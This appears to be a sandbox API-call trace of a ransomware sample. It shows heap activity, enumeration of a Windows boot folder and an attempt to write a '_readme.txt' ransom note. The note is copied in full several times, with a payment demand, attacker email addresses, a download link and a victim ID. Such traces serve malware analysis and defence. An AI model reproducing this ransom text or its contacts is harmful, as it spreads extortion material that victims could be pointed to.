[0165.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.575] PathFindFileNameW (pszPath="C:\\Boot\\en-US\\") returned="en-US\\" [0165.575] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.575] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.575] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.575] PathFindFileNameW (pszPath="") returned="" [0165.575] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.575] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.575] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.575] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0165.575] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.576] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19640 [0165.576] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.576] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.576] PathAppendW (in: pszPath="C:\\Boot\\en-US\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0165.576] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.576] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.576] PathFileExistsW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned 0 [0165.577] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b44e70 [0165.577] lstrcpyW (in: lpString1=0x3b44e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.577] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.577] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.577] CreateFileW (lpFileName="C:\\Boot\\en-US\\_readme.txt" (normalized: "c:\\boot\\en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.577] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.577] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e70 | out: hHeap=0xcd0000) returned 1 [0165.577] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.577] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.577] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.578] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.578] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.578] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.578] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0165.578] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0165.578] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.578] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.578] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c200 | out: hHeap=0xcd0000) returned 1 [0165.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c200 [0165.578] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.578] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.578] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.578] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.578] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.578] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.578] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.578] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.581] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.581] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.581] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.581] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.581] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.581] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.581] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.581] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.581] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.581] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.581] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.581] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.581] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.581] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.581] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.581] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.581] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.581] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.581] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.581] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.581] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.581] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.581] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.581] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.581] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.581] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.581] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.581] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.581] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.581] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.581] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.581] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.582] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.582] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.582] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.582] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.582] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.582] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.582] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.582] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.582] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.582] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.582] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.582] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.582] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.582] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.582] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 